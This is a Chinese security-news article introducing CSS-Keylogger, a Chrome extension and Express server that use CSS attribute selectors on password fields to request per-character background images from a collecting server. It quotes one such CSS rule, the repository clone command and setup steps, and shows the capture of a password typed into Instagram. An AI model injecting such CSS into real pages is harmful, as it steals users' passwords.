keylogger

keylogger
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
CSS-Keylogger：一个利用CSS实现的Chrome键盘记录插件 Alpha_h4ck2018-03-10共189568人围观，发现 3 个不明物体工具
今天给大家介绍的是一款名叫CSS-Keylogger的键盘记录工具，其实严格来说，它应该是一款Chrome插件，工具的使用还需要搭配Express服务器。

1.png

工作机制
该工具的运行机制其实非常简单，它利用的是CSS属性收集器，并且能够在加载网页背景图像的时候从外部服务器请求资源。

比如说，下面给出的这段CSS代码可以选择出所有type=“password”并且value值以“a”结尾的input输入框。接下来，它会尝试从http://localhost:3000/a加载一张图像。

input[type="password"][value$="a"]{
background-image:url("http://localhost:3000/a");
}
我们只需要使用一个简单的脚本，就能够创建一个可以发送自定义请求（可包含任意ASCII字符）的css文件了。

脚本下载：【传送门】

CSS文件获取：【传送门】

工具使用
设置Chrome扩展
1. 使用下列命令将CSS-Keylogger代码库克隆到本地：

git clone https://github.com/maxchehab/CSS-Keylogging
2. 打开浏览器并访问chrome://extensions（或者通过点击浏览器右上角三个点的图标来打开Chrome菜单，进入“更多工具”并选择“扩展程序”）。

3. 确保右上角的开发者模式选项已勾选。

4. 点击“加载已解压的扩展程序…”。

5. 选择你下载在本地的css-keylogger-extension目录。

2.png

设置Express服务器
yarn
yarn start
获取密码
1. 打开一个使用了控制组件框架（例如React）的网站，例如https://www.instagram.com/；

2. 打开网页之后，点击浏览器右上角的“C”字图标；

3. 输入你的密码；

4. 接下来，Express服务器将会捕捉到你所输入的密码；

3.png

就是这么简单！希望本工具可以给大家提供帮助或带来一些灵感。

工具下载
CSS-Keylogger：【传送门】

* 参考来源：CSS-Keylogging，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM

Alpha_h4ck
Alpha_h4ck
578 篇文章
等级： 10级
||
上一篇：HELK：一款具有高级分析功能的漏洞挖掘平台下一篇：打造一款属于自己的远程管理软件（一）
发表评论已有 3 条评论

xrahitel 2018-03-11回复 1楼
тупая хуня какая та для чего он себя отьебать

亮了(5)

test 2018-03-11回复 2楼
能控制无害css情况下外传数据

亮了(0)

Kr0Day 2018-03-13回复 3楼
Mark

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
Alpha_h4ck
Alpha_h4ck

好好学习，天天向上

578
文章数
5
评论数
最近文章
Slither：第一款针对Solidity的静态分析框架
2018.11.18

BYOB：我的天！又一个僵尸网络开源了BYOB僵尸网络开源代码
2018.11.18

BlobRunner：一款功能强大的恶意软件Shellcode调试与分析工具
2018.11.16

浏览更多
相关阅读
技术分享：逆向分析ATM分离器CSS-Keylogger：一个利用CSS实现的Chrome键盘记录插件美国警长给妻子电脑安装键盘记录器遭判刑
Kali下的蓝牙设备侦察方法介绍本地网络连接监测软件SterJo NetStalker v.1.0
特别推荐

关注我们分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

keylogger

文章评论